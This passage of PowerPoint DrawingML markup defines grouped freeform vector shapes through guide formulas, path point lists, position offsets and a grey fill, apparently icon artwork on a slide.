                  <a:gd name="T43" fmla="*/ 426 h 626"/>
                  <a:gd name="T44" fmla="*/ 750 w 757"/>
                  <a:gd name="T45" fmla="*/ 457 h 626"/>
                  <a:gd name="T46" fmla="*/ 756 w 757"/>
                  <a:gd name="T47" fmla="*/ 489 h 626"/>
                  <a:gd name="T48" fmla="*/ 756 w 757"/>
                  <a:gd name="T49" fmla="*/ 489 h 626"/>
                  <a:gd name="T50" fmla="*/ 745 w 757"/>
                  <a:gd name="T51" fmla="*/ 526 h 626"/>
                  <a:gd name="T52" fmla="*/ 735 w 757"/>
                  <a:gd name="T53" fmla="*/ 567 h 626"/>
                  <a:gd name="T54" fmla="*/ 714 w 757"/>
                  <a:gd name="T55" fmla="*/ 625 h 626"/>
                  <a:gd name="T56" fmla="*/ 614 w 757"/>
                  <a:gd name="T57" fmla="*/ 588 h 626"/>
                  <a:gd name="T58" fmla="*/ 614 w 757"/>
                  <a:gd name="T59" fmla="*/ 588 h 626"/>
                  <a:gd name="T60" fmla="*/ 630 w 757"/>
                  <a:gd name="T61" fmla="*/ 557 h 6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57" h="626">
                    <a:moveTo>
                      <a:pt x="630" y="557"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="630" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="740" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="740" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="557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3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6546612" y="3582807"/>
            <a:ext cx="2629523" cy="2570011"/>
            <a:chOff x="6546612" y="3582807"/>
            <a:chExt cx="2629523" cy="2570011"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="271" name="Group 270"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6696959" y="3582807"/>
              <a:ext cx="2176915" cy="1819836"/>
              <a:chOff x="2455863" y="1114425"/>
              <a:chExt cx="2206625" cy="1844675"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="357" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2455863" y="2816225"/>
                <a:ext cx="263525" cy="142875"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 731"/>
                  <a:gd name="T1" fmla="*/ 215 h 395"/>
                  <a:gd name="T2" fmla="*/ 142 w 731"/>
                  <a:gd name="T3" fmla="*/ 357 h 395"/>
                  <a:gd name="T4" fmla="*/ 47 w 731"/>
                  <a:gd name="T5" fmla="*/ 320 h 395"/>
                  <a:gd name="T6" fmla="*/ 53 w 731"/>
                  <a:gd name="T7" fmla="*/ 310 h 395"/>
                  <a:gd name="T8" fmla="*/ 53 w 731"/>
                  <a:gd name="T9" fmla="*/ 310 h 395"/>
                  <a:gd name="T10" fmla="*/ 63 w 731"/>
                  <a:gd name="T11" fmla="*/ 273 h 395"/>
                  <a:gd name="T12" fmla="*/ 68 w 731"/>
                  <a:gd name="T13" fmla="*/ 241 h 395"/>
                  <a:gd name="T14" fmla="*/ 74 w 731"/>
                  <a:gd name="T15" fmla="*/ 215 h 395"/>
                  <a:gd name="T16" fmla="*/ 68 w 731"/>
                  <a:gd name="T17" fmla="*/ 189 h 395"/>
                  <a:gd name="T18" fmla="*/ 68 w 731"/>
                  <a:gd name="T19" fmla="*/ 189 h 395"/>
                  <a:gd name="T20" fmla="*/ 58 w 731"/>
                  <a:gd name="T21" fmla="*/ 163 h 395"/>
                  <a:gd name="T22" fmla="*/ 47 w 731"/>
                  <a:gd name="T23" fmla="*/ 142 h 395"/>
                  <a:gd name="T24" fmla="*/ 26 w 731"/>
                  <a:gd name="T25" fmla="*/ 121 h 395"/>
                  <a:gd name="T26" fmla="*/ 0 w 731"/>
                  <a:gd name="T27" fmla="*/ 105 h 395"/>
                  <a:gd name="T28" fmla="*/ 42 w 731"/>
                  <a:gd name="T29" fmla="*/ 0 h 395"/>
                  <a:gd name="T30" fmla="*/ 730 w 731"/>
                  <a:gd name="T31" fmla="*/ 252 h 395"/>
                  <a:gd name="T32" fmla="*/ 682 w 731"/>
                  <a:gd name="T33" fmla="*/ 394 h 395"/>
                  <a:gd name="T34" fmla="*/ 189 w 731"/>
                  <a:gd name="T35" fmla="*/ 215 h 3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31" h="395">
                    <a:moveTo>
                      <a:pt x="189" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="215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8" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2693988" y="2770188"/>
                <a:ext cx="71437" cy="68262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 199 w 200"/>
                  <a:gd name="T1" fmla="*/ 63 h 190"/>
                  <a:gd name="T2" fmla="*/ 147 w 200"/>
                  <a:gd name="T3" fmla="*/ 189 h 190"/>
                  <a:gd name="T4" fmla="*/ 0 w 200"/>
                  <a:gd name="T5" fmla="*/ 126 h 190"/>
                  <a:gd name="T6" fmla="*/ 52 w 200"/>
                  <a:gd name="T7" fmla="*/ 0 h 190"/>
                  <a:gd name="T8" fmla="*/ 199 w 200"/>
                  <a:gd name="T9" fmla="*/ 63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" h="190">
                    <a:moveTo>
                      <a:pt x="199" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="147" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="63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9" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2540000" y="2514600"/>
                <a:ext cx="263525" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 116 w 731"/>
                  <a:gd name="T1" fmla="*/ 115 h 678"/>
                  <a:gd name="T2" fmla="*/ 116 w 731"/>
                  <a:gd name="T3" fmla="*/ 115 h 678"/>
                  <a:gd name="T4" fmla="*/ 142 w 731"/>
                  <a:gd name="T5" fmla="*/ 68 h 678"/>
                  <a:gd name="T6" fmla="*/ 179 w 731"/>
                  <a:gd name="T7" fmla="*/ 37 h 678"/>
                  <a:gd name="T8" fmla="*/ 179 w 731"/>
                  <a:gd name="T9" fmla="*/ 37 h 678"/>
                  <a:gd name="T10" fmla="*/ 210 w 731"/>
                  <a:gd name="T11" fmla="*/ 15 h 678"/>
                  <a:gd name="T12" fmla="*/ 252 w 731"/>
                  <a:gd name="T13" fmla="*/ 0 h 678"/>
                  <a:gd name="T14" fmla="*/ 252 w 731"/>
                  <a:gd name="T15" fmla="*/ 0 h 678"/>
                  <a:gd name="T16" fmla="*/ 289 w 731"/>
                  <a:gd name="T17" fmla="*/ 0 h 678"/>
                  <a:gd name="T18" fmla="*/ 331 w 731"/>
                  <a:gd name="T19" fmla="*/ 5 h 678"/>
                  <a:gd name="T20" fmla="*/ 331 w 731"/>
                  <a:gd name="T21" fmla="*/ 5 h 678"/>
                  <a:gd name="T22" fmla="*/ 368 w 731"/>
                  <a:gd name="T23" fmla="*/ 15 h 678"/>
                  <a:gd name="T24" fmla="*/ 405 w 731"/>
                  <a:gd name="T25" fmla="*/ 32 h 678"/>
                  <a:gd name="T26" fmla="*/ 405 w 731"/>
                  <a:gd name="T27" fmla="*/ 32 h 678"/>
                  <a:gd name="T28" fmla="*/ 452 w 731"/>
                  <a:gd name="T29" fmla="*/ 58 h 678"/>
                  <a:gd name="T30" fmla="*/ 489 w 731"/>
                  <a:gd name="T31" fmla="*/ 89 h 678"/>
                  <a:gd name="T32" fmla="*/ 489 w 731"/>
                  <a:gd name="T33" fmla="*/ 89 h 678"/>
                  <a:gd name="T34" fmla="*/ 515 w 731"/>
                  <a:gd name="T35" fmla="*/ 126 h 678"/>
                  <a:gd name="T36" fmla="*/ 530 w 731"/>
                  <a:gd name="T37" fmla="*/ 162 h 678"/>
                  <a:gd name="T38" fmla="*/ 530 w 731"/>
                  <a:gd name="T39" fmla="*/ 162 h 678"/>
                  <a:gd name="T40" fmla="*/ 536 w 731"/>
                  <a:gd name="T41" fmla="*/ 205 h 678"/>
                  <a:gd name="T42" fmla="*/ 530 w 731"/>
                  <a:gd name="T43" fmla="*/ 247 h 678"/>
                  <a:gd name="T44" fmla="*/ 530 w 731"/>
                  <a:gd name="T45" fmla="*/ 247 h 678"/>
                  <a:gd name="T46" fmla="*/ 520 w 731"/>
                  <a:gd name="T47" fmla="*/ 294 h 678"/>
                  <a:gd name="T48" fmla="*/ 504 w 731"/>
                  <a:gd name="T49" fmla="*/ 341 h 678"/>
                  <a:gd name="T50" fmla="*/ 467 w 731"/>
                  <a:gd name="T51" fmla="*/ 415 h 678"/>
                  <a:gd name="T52" fmla="*/ 730 w 731"/>
                  <a:gd name="T53" fmla="*/ 546 h 678"/>
                  <a:gd name="T54" fmla="*/ 667 w 731"/>
                  <a:gd name="T55" fmla="*/ 677 h 678"/>
                  <a:gd name="T56" fmla="*/ 0 w 731"/>
                  <a:gd name="T57" fmla="*/ 346 h 678"/>
                  <a:gd name="T58" fmla="*/ 116 w 731"/>
                  <a:gd name="T59" fmla="*/ 115 h 678"/>
                  <a:gd name="T60" fmla="*/ 399 w 731"/>
                  <a:gd name="T61" fmla="*/ 305 h 678"/>
                  <a:gd name="T62" fmla="*/ 399 w 731"/>
                  <a:gd name="T63" fmla="*/ 305 h 678"/>
                  <a:gd name="T64" fmla="*/ 405 w 731"/>
                  <a:gd name="T65" fmla="*/ 283 h 678"/>
                  <a:gd name="T66" fmla="*/ 409 w 731"/>
                  <a:gd name="T67" fmla="*/ 262 h 678"/>
                  <a:gd name="T68" fmla="*/ 409 w 731"/>
                  <a:gd name="T69" fmla="*/ 247 h 678"/>
                  <a:gd name="T70" fmla="*/ 405 w 731"/>
                  <a:gd name="T71" fmla="*/ 226 h 678"/>
                  <a:gd name="T72" fmla="*/ 405 w 731"/>
                  <a:gd name="T73" fmla="*/ 226 h 678"/>
                  <a:gd name="T74" fmla="*/ 399 w 731"/>
                  <a:gd name="T75" fmla="*/ 210 h 678"/>
                  <a:gd name="T76" fmla="*/ 383 w 731"/>
                  <a:gd name="T77" fmla="*/ 194 h 678"/>
                  <a:gd name="T78" fmla="*/ 368 w 731"/>
                  <a:gd name="T79" fmla="*/ 179 h 678"/>
                  <a:gd name="T80" fmla="*/ 342 w 731"/>
                  <a:gd name="T81" fmla="*/ 162 h 678"/>
                  <a:gd name="T82" fmla="*/ 342 w 731"/>
                  <a:gd name="T83" fmla="*/ 162 h 678"/>
                  <a:gd name="T84" fmla="*/ 315 w 731"/>
                  <a:gd name="T85" fmla="*/ 152 h 678"/>
                  <a:gd name="T86" fmla="*/ 294 w 731"/>
                  <a:gd name="T87" fmla="*/ 147 h 678"/>
                  <a:gd name="T88" fmla="*/ 273 w 731"/>
                  <a:gd name="T89" fmla="*/ 147 h 678"/>
                  <a:gd name="T90" fmla="*/ 258 w 731"/>
                  <a:gd name="T91" fmla="*/ 147 h 678"/>
                  <a:gd name="T92" fmla="*/ 258 w 731"/>
                  <a:gd name="T93" fmla="*/ 147 h 678"/>
                  <a:gd name="T94" fmla="*/ 236 w 731"/>
                  <a:gd name="T95" fmla="*/ 158 h 678"/>
                  <a:gd name="T96" fmla="*/ 221 w 731"/>
                  <a:gd name="T97" fmla="*/ 168 h 678"/>
                  <a:gd name="T98" fmla="*/ 205 w 731"/>
                  <a:gd name="T99" fmla="*/ 184 h 678"/>
                  <a:gd name="T100" fmla="*/ 195 w 731"/>
                  <a:gd name="T101" fmla="*/ 210 h 678"/>
                  <a:gd name="T102" fmla="*/ 168 w 731"/>
                  <a:gd name="T103" fmla="*/ 262 h 678"/>
                  <a:gd name="T104" fmla="*/ 368 w 731"/>
                  <a:gd name="T105" fmla="*/ 362 h 678"/>
                  <a:gd name="T106" fmla="*/ 399 w 731"/>
                  <a:gd name="T107" fmla="*/ 305 h 6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31" h="678">
                    <a:moveTo>
                      <a:pt x="116" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="399" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="399" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="305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0" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2635250" y="2368550"/>
                <a:ext cx="307975" cy="219075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 856"/>
                  <a:gd name="T1" fmla="*/ 110 h 610"/>
                  <a:gd name="T2" fmla="*/ 283 w 856"/>
                  <a:gd name="T3" fmla="*/ 231 h 610"/>
                  <a:gd name="T4" fmla="*/ 283 w 856"/>
                  <a:gd name="T5" fmla="*/ 231 h 610"/>
                  <a:gd name="T6" fmla="*/ 283 w 856"/>
                  <a:gd name="T7" fmla="*/ 231 h 610"/>
                  <a:gd name="T8" fmla="*/ 267 w 856"/>
                  <a:gd name="T9" fmla="*/ 194 h 610"/>
                  <a:gd name="T10" fmla="*/ 267 w 856"/>
                  <a:gd name="T11" fmla="*/ 152 h 610"/>
                  <a:gd name="T12" fmla="*/ 273 w 856"/>
                  <a:gd name="T13" fmla="*/ 115 h 610"/>
                  <a:gd name="T14" fmla="*/ 289 w 856"/>
                  <a:gd name="T15" fmla="*/ 73 h 610"/>
                  <a:gd name="T16" fmla="*/ 289 w 856"/>
                  <a:gd name="T17" fmla="*/ 73 h 610"/>
                  <a:gd name="T18" fmla="*/ 310 w 856"/>
                  <a:gd name="T19" fmla="*/ 47 h 610"/>
                  <a:gd name="T20" fmla="*/ 330 w 856"/>
                  <a:gd name="T21" fmla="*/ 26 h 610"/>
                  <a:gd name="T22" fmla="*/ 351 w 856"/>
                  <a:gd name="T23" fmla="*/ 10 h 610"/>
                  <a:gd name="T24" fmla="*/ 378 w 856"/>
                  <a:gd name="T25" fmla="*/ 5 h 610"/>
                  <a:gd name="T26" fmla="*/ 378 w 856"/>
                  <a:gd name="T27" fmla="*/ 5 h 610"/>
                  <a:gd name="T28" fmla="*/ 404 w 856"/>
                  <a:gd name="T29" fmla="*/ 0 h 610"/>
                  <a:gd name="T30" fmla="*/ 436 w 856"/>
                  <a:gd name="T31" fmla="*/ 5 h 610"/>
                  <a:gd name="T32" fmla="*/ 467 w 856"/>
                  <a:gd name="T33" fmla="*/ 15 h 610"/>
                  <a:gd name="T34" fmla="*/ 498 w 856"/>
                  <a:gd name="T35" fmla="*/ 31 h 610"/>
                  <a:gd name="T36" fmla="*/ 855 w 856"/>
                  <a:gd name="T37" fmla="*/ 246 h 610"/>
                  <a:gd name="T38" fmla="*/ 782 w 856"/>
                  <a:gd name="T39" fmla="*/ 367 h 610"/>
                  <a:gd name="T40" fmla="*/ 451 w 856"/>
                  <a:gd name="T41" fmla="*/ 173 h 610"/>
                  <a:gd name="T42" fmla="*/ 451 w 856"/>
                  <a:gd name="T43" fmla="*/ 173 h 610"/>
                  <a:gd name="T44" fmla="*/ 420 w 856"/>
                  <a:gd name="T45" fmla="*/ 157 h 610"/>
                  <a:gd name="T46" fmla="*/ 393 w 856"/>
                  <a:gd name="T47" fmla="*/ 152 h 610"/>
                  <a:gd name="T48" fmla="*/ 393 w 856"/>
                  <a:gd name="T49" fmla="*/ 152 h 610"/>
                  <a:gd name="T50" fmla="*/ 373 w 856"/>
                  <a:gd name="T51" fmla="*/ 162 h 610"/>
                  <a:gd name="T52" fmla="*/ 351 w 856"/>
                  <a:gd name="T53" fmla="*/ 183 h 610"/>
                  <a:gd name="T54" fmla="*/ 351 w 856"/>
                  <a:gd name="T55" fmla="*/ 183 h 610"/>
                  <a:gd name="T56" fmla="*/ 346 w 856"/>
                  <a:gd name="T57" fmla="*/ 199 h 610"/>
                  <a:gd name="T58" fmla="*/ 341 w 856"/>
                  <a:gd name="T59" fmla="*/ 215 h 610"/>
                  <a:gd name="T60" fmla="*/ 341 w 856"/>
                  <a:gd name="T61" fmla="*/ 231 h 610"/>
                  <a:gd name="T62" fmla="*/ 346 w 856"/>
                  <a:gd name="T63" fmla="*/ 246 h 610"/>
                  <a:gd name="T64" fmla="*/ 351 w 856"/>
                  <a:gd name="T65" fmla="*/ 257 h 610"/>
                  <a:gd name="T66" fmla="*/ 362 w 856"/>
                  <a:gd name="T67" fmla="*/ 272 h 610"/>
                  <a:gd name="T68" fmla="*/ 393 w 856"/>
                  <a:gd name="T69" fmla="*/ 299 h 610"/>
                  <a:gd name="T70" fmla="*/ 714 w 856"/>
                  <a:gd name="T71" fmla="*/ 488 h 610"/>
                  <a:gd name="T72" fmla="*/ 640 w 856"/>
                  <a:gd name="T73" fmla="*/ 609 h 610"/>
                  <a:gd name="T74" fmla="*/ 0 w 856"/>
                  <a:gd name="T75" fmla="*/ 231 h 610"/>
                  <a:gd name="T76" fmla="*/ 73 w 856"/>
                  <a:gd name="T77" fmla="*/ 110 h 6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856" h="610">
                    <a:moveTo>
                      <a:pt x="73" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="11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1" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2786063" y="2195513"/>
                <a:ext cx="257175" cy="271462"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 572 w 715"/>
                  <a:gd name="T1" fmla="*/ 666 h 756"/>
                  <a:gd name="T2" fmla="*/ 572 w 715"/>
                  <a:gd name="T3" fmla="*/ 666 h 756"/>
                  <a:gd name="T4" fmla="*/ 582 w 715"/>
                  <a:gd name="T5" fmla="*/ 635 h 756"/>
                  <a:gd name="T6" fmla="*/ 588 w 715"/>
                  <a:gd name="T7" fmla="*/ 625 h 756"/>
                  <a:gd name="T8" fmla="*/ 582 w 715"/>
                  <a:gd name="T9" fmla="*/ 608 h 756"/>
                  <a:gd name="T10" fmla="*/ 582 w 715"/>
                  <a:gd name="T11" fmla="*/ 608 h 756"/>
                  <a:gd name="T12" fmla="*/ 572 w 715"/>
                  <a:gd name="T13" fmla="*/ 582 h 756"/>
                  <a:gd name="T14" fmla="*/ 551 w 715"/>
